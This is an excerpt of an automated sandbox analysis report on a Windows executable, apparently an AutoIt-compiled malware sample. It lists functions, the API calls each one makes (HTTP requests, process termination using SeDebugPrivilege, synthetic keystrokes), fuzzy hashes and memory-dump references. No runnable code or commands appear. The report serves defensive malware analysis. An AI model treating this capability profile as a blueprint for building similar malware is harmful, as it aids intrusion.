            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CurrentDirectory$AttributesFile
            • String ID: *.*
            • API String ID: 769691225-438819550
            • Opcode ID: c10ab7b9d64adc07829ff150e2e320c9c79a36438232824643e4fd27b7e4ffeb
            • Instruction ID: 19d0b8640a1963a5375f8095a3fbdd59744f60535a8f699f3391c2c637846a26
            • Opcode Fuzzy Hash: c10ab7b9d64adc07829ff150e2e320c9c79a36438232824643e4fd27b7e4ffeb
            • Instruction Fuzzy Hash: 3981C0725042059FDB60EF18C844AAEB7E8BF89310F048C5EF9C5D7255EB39EA45CB92
            Function 00FA5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
            Download Yara Rule
            APIs
            • SetWindowLongW.USER32(?,000000EB), ref: 00FA5C7A
              • Part of subcall function 00FA5D0A: GetClientRect.USER32(?,?), ref: 00FA5D30
              • Part of subcall function 00FA5D0A: GetWindowRect.USER32(?,?), ref: 00FA5D71
              • Part of subcall function 00FA5D0A: ScreenToClient.USER32(?,?), ref: 00FA5D99
            • GetDC.USER32 ref: 00FE46F5
            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FE4708
            • SelectObject.GDI32(00000000,00000000), ref: 00FE4716
            • SelectObject.GDI32(00000000,00000000), ref: 00FE472B
            • ReleaseDC.USER32(?,00000000), ref: 00FE4733
            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FE47C4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
            • String ID: U
            • API String ID: 4009187628-3372436214
            • Opcode ID: c59264511597fdc09f17e8cf8f05dace0ae48dba172c3689d7413496078aed48
            • Instruction ID: 0a21baa6bba19c64fa6d80a49eedba286104d0b7e33df40bc01a4a73f4956cfa
            • Opcode Fuzzy Hash: c59264511597fdc09f17e8cf8f05dace0ae48dba172c3689d7413496078aed48
            • Instruction Fuzzy Hash: 1B71F131800285DFCF218F65C984ABA7BB5FF4A374F14426DED916A1A9C335A841EF90
            Function 0101359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
            Download Yara Rule
            APIs
            • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 010135E4
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • LoadStringW.USER32(01072390,?,00000FFF,?), ref: 0101360A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LoadString$_wcslen
            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
            • API String ID: 4099089115-2391861430
            • Opcode ID: 260262979b9bab3f4a43f20edf43f27c6583b35f1ba7e9406647a4daa4b8f45a
            • Instruction ID: 810c130deccb31190530d2b361eeb4ccc2d92ea57ffc5d4da0dafa30afa60ce6
            • Opcode Fuzzy Hash: 260262979b9bab3f4a43f20edf43f27c6583b35f1ba7e9406647a4daa4b8f45a
            • Instruction Fuzzy Hash: CC51A0B1C0021AABDF15EBA0CC42EEEBB79FF05350F044165F14576195EB392A98EFA0
            Function 01038B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
              • Part of subcall function 00FB912D: GetCursorPos.USER32(?), ref: 00FB9141
              • Part of subcall function 00FB912D: ScreenToClient.USER32(00000000,?), ref: 00FB915E
              • Part of subcall function 00FB912D: GetAsyncKeyState.USER32(00000001), ref: 00FB9183
              • Part of subcall function 00FB912D: GetAsyncKeyState.USER32(00000002), ref: 00FB919D
            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 01038B6B
            • ImageList_EndDrag.COMCTL32 ref: 01038B71
            • ReleaseCapture.USER32 ref: 01038B77
            • SetWindowTextW.USER32(?,00000000), ref: 01038C12
            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 01038C25
            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 01038CFF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
            • String ID: @GUI_DRAGFILE$@GUI_DROPID
            • API String ID: 1924731296-2107944366
            • Opcode ID: 4ef4378320ba77c6ddd00e85548cad6d3d3a22fdae2633947182dedbb2a0766c
            • Instruction ID: af52cf4d47e6c085f0a822a7186ee33e15ca4e79c2d0a30d6f8a5e2ef78ffcdc
            • Opcode Fuzzy Hash: 4ef4378320ba77c6ddd00e85548cad6d3d3a22fdae2633947182dedbb2a0766c
            • Instruction Fuzzy Hash: C551ADB1504304AFE714DF24CC55FAA77E8FB89714F00066EF992A72D1CB75A904DB62
            Function 0101C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
            Download Yara Rule
            APIs
            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101C272
            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0101C29A
            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0101C2CA
            • GetLastError.KERNEL32 ref: 0101C322
            • SetEvent.KERNEL32(?), ref: 0101C336
            • InternetCloseHandle.WININET(00000000), ref: 0101C341
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
            • String ID:
            • API String ID: 3113390036-3916222277
            • Opcode ID: 2e2779c78e06300e10152cced5316a7235be2dcf2b1408a324001cd1aa4477ca
            • Instruction ID: d347608ed276d2d345561fd3ac75dac4656ad8c980f1f95aad01632cbe822f8f
            • Opcode Fuzzy Hash: 2e2779c78e06300e10152cced5316a7235be2dcf2b1408a324001cd1aa4477ca
            • Instruction Fuzzy Hash: 4D316471540604AFF7729F65CA88AAF7BFCFB49644F04851EF4C6D2204DB39DA048B61
            Function 0100989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FE3AAF,?,?,Bad directive syntax error,0103CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 010098BC
            • LoadStringW.USER32(00000000,?,00FE3AAF,?), ref: 010098C3
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 01009987
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HandleLoadMessageModuleString_wcslen
            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
            • API String ID: 858772685-4153970271
            • Opcode ID: c67ae91fc7cb3393511ee1e00e73c4c658dd0a6c59e766776a32ff2f59dced79
            • Instruction ID: 61e3b7502934734a3470a984a7b9b946fa3041508f2eaacad9241a1539c08aed
            • Opcode Fuzzy Hash: c67ae91fc7cb3393511ee1e00e73c4c658dd0a6c59e766776a32ff2f59dced79
            • Instruction Fuzzy Hash: A221E172C0421ABBDF12AF91CC06EEE7779FF19304F04442AF55576092EB79A618EB50
            Function 0100209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
            Download Yara Rule
            APIs
            • GetParent.USER32 ref: 010020AB
            • GetClassNameW.USER32(00000000,?,00000100), ref: 010020C0
            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0100214D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ClassMessageNameParentSend
            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
            • API String ID: 1290815626-3381328864
            • Opcode ID: 5162abc3071aa55e7c8f65fec153e3c2fd8543af290b7f7f82b4f031bd6a519f
            • Instruction ID: d9459a55abb53c5ba96b63ce9bb790068d831d759ddf2ceee46fcf294878dd62
            • Opcode Fuzzy Hash: 5162abc3071aa55e7c8f65fec153e3c2fd8543af290b7f7f82b4f031bd6a519f
            • Instruction Fuzzy Hash: 93113A7A284307B9F6172524DC0BDEA73DCCB14364F10105AF784A80D2FA6974016A14
            Function 00FDCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
            • String ID:
            • API String ID: 1282221369-0
            • Opcode ID: bc4a5c4d6f03a810ca69b3a02f4601aebaa46970a0c3800a4fdfd1714d0534c6
            • Instruction ID: e8e5ea731a92e753d8c303795a0a265f58fac28eeef171a290bf1a7cd4b29045
            • Opcode Fuzzy Hash: bc4a5c4d6f03a810ca69b3a02f4601aebaa46970a0c3800a4fdfd1714d0534c6
            • Instruction Fuzzy Hash: 2761C472D04302ABDB21AF649845AAD7BA7AF05320F0C416BF945A7385D63A9D01F7E1
            Function 010350D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 01035186
            • ShowWindow.USER32(?,00000000), ref: 010351C7
            • ShowWindow.USER32(?,00000005,?,00000000), ref: 010351CD
            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 010351D1
              • Part of subcall function 01036FBA: DeleteObject.GDI32(00000000), ref: 01036FE6
            • GetWindowLongW.USER32(?,000000F0), ref: 0103520D
            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0103521A
            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0103524D
            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 01035287
            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 01035296
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
            • String ID:
            • API String ID: 3210457359-0
            • Opcode ID: 73e9e0c422baed7ff1b86e8fa0f60dc98f1a80b5c6777b8e0484e97d1a7ee089
            • Instruction ID: 57029ee4a0dacbb3a48d67e1250a34606cadc587e0cfe037db5deed341dee691
            • Opcode Fuzzy Hash: 73e9e0c422baed7ff1b86e8fa0f60dc98f1a80b5c6777b8e0484e97d1a7ee089
            • Instruction Fuzzy Hash: F051B330A40209BFFF709E29CC45BD83BADFB86321F144452FA95A62F0D775A590DB41
            Function 00FB8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
            Download Yara Rule
            APIs
            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00FF6890
            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00FF68A9
            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FF68B9
            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00FF68D1
            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FF68F2
            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00FF6901
            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FF691E
            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00FF692D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Icon$DestroyExtractImageLoadMessageSend
            • String ID:
            • API String ID: 1268354404-0
            • Opcode ID: b1000483d2c70ca9dfc0403c55d8106a1a92f3298fea234972f0631ba89f8d43
            • Instruction ID: 50ebd9e9673b99c639d7f3788e12d56319b1712eb64f00de360c2f5f26c44714
            • Opcode Fuzzy Hash: b1000483d2c70ca9dfc0403c55d8106a1a92f3298fea234972f0631ba89f8d43
            • Instruction Fuzzy Hash: 92517F71A00209AFDB20CF25CC45BAA7BB9FF84760F108518F952E72D0DB75E951EB50
            Function 0101C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
            Download Yara Rule
            APIs
            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0101C182
            • GetLastError.KERNEL32 ref: 0101C195
            • SetEvent.KERNEL32(?), ref: 0101C1A9
              • Part of subcall function 0101C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101C272
              • Part of subcall function 0101C253: GetLastError.KERNEL32 ref: 0101C322
              • Part of subcall function 0101C253: SetEvent.KERNEL32(?), ref: 0101C336
              • Part of subcall function 0101C253: InternetCloseHandle.WININET(00000000), ref: 0101C341
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
            • String ID:
            • API String ID: 337547030-0
            • Opcode ID: 21331bb4304f25cd95ace075bdc5c571bb0c4e7061923fb8b64de212839c8acd
            • Instruction ID: 82c5a7dd55322169ed1508051f912d850503005585aea75221f3b05f83a22c30
            • Opcode Fuzzy Hash: 21331bb4304f25cd95ace075bdc5c571bb0c4e7061923fb8b64de212839c8acd
            • Instruction Fuzzy Hash: F5319471180641AFFB219FA5DA44AAABBFCFF19300B04441EF9DAD3608D739E414DB60
            Function 010025A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 01003A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01003A57
              • Part of subcall function 01003A3D: GetCurrentThreadId.KERNEL32 ref: 01003A5E
              • Part of subcall function 01003A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010025B3), ref: 01003A65
            • MapVirtualKeyW.USER32(00000025,00000000), ref: 010025BD
            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 010025DB
            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 010025DF
            • MapVirtualKeyW.USER32(00000025,00000000), ref: 010025E9
            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 01002601
            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 01002605
            • MapVirtualKeyW.USER32(00000025,00000000), ref: 0100260F
            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 01002623
            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 01002627
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
            • String ID:
            • API String ID: 2014098862-0
            • Opcode ID: 2bc059c32ce65ac7818022f8097e9f7f864a61d5e6f95be8b6d92d63c6f61ce5
            • Instruction ID: 232c98ea677efe5568f02f2815809b1e732f447071121b97037670b970260403
            • Opcode Fuzzy Hash: 2bc059c32ce65ac7818022f8097e9f7f864a61d5e6f95be8b6d92d63c6f61ce5
            • Instruction Fuzzy Hash: 1001D431790210BBFB2166689C8EF993F5DEB4FB12F100012F398FE0C4C9F224449A69
            Function 01001803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
            Download Yara Rule
            APIs
            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,01001449,?,?,00000000), ref: 0100180C
            • HeapAlloc.KERNEL32(00000000,?,01001449,?,?,00000000), ref: 01001813
            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01001449,?,?,00000000), ref: 01001828
            • GetCurrentProcess.KERNEL32(?,00000000,?,01001449,?,?,00000000), ref: 01001830
            • DuplicateHandle.KERNEL32(00000000,?,01001449,?,?,00000000), ref: 01001833
            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01001449,?,?,00000000), ref: 01001843
            • GetCurrentProcess.KERNEL32(01001449,00000000,?,01001449,?,?,00000000), ref: 0100184B
            • DuplicateHandle.KERNEL32(00000000,?,01001449,?,?,00000000), ref: 0100184E
            • CreateThread.KERNEL32(00000000,00000000,01001874,00000000,00000000,00000000), ref: 01001868
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
            • String ID:
            • API String ID: 1957940570-0
            • Opcode ID: 494950d9e6958390321f808ae4af244ceaa72c4f489d7eca2bfac18b5794f046
            • Instruction ID: 7b3d01291db1fb287dcbd5acf9b01b8e63e55b58a7cda95a9993cecac5cd6bdd
            • Opcode Fuzzy Hash: 494950d9e6958390321f808ae4af244ceaa72c4f489d7eca2bfac18b5794f046
            • Instruction Fuzzy Hash: FA01BBB5240308BFF720ABA5DD4DF6B3BACEB8AB11F004411FA45EB195CA75D810DB20
            Function 0102A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 0100D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0100D501
              • Part of subcall function 0100D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0100D50F
              • Part of subcall function 0100D4DC: CloseHandle.KERNEL32(00000000), ref: 0100D5DC
            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0102A16D
            • GetLastError.KERNEL32 ref: 0102A180
            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0102A1B3
            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0102A268
            • GetLastError.KERNEL32(00000000), ref: 0102A273
            • CloseHandle.KERNEL32(00000000), ref: 0102A2C4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
            • String ID: SeDebugPrivilege
            • API String ID: 2533919879-2896544425
            • Opcode ID: 572497efbb95546bc181753db6d2c1715332b461e627b2f038c0ff1f6350d273
            • Instruction ID: 6aab489ee5b7726876e172695365ce48603e8736cffea6632bf974d1b2c34600
            • Opcode Fuzzy Hash: 572497efbb95546bc181753db6d2c1715332b461e627b2f038c0ff1f6350d273
            • Instruction Fuzzy Hash: 3361B170204252DFE720DF18C894F19BBE5AF45318F18849CE5A68BB93CB76ED49CB91
            Function 01033886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01033925
            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0103393A
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01033954
            • _wcslen.LIBCMT ref: 01033999
            • SendMessageW.USER32(?,00001057,00000000,?), ref: 010339C6
            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 010339F4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$Window_wcslen
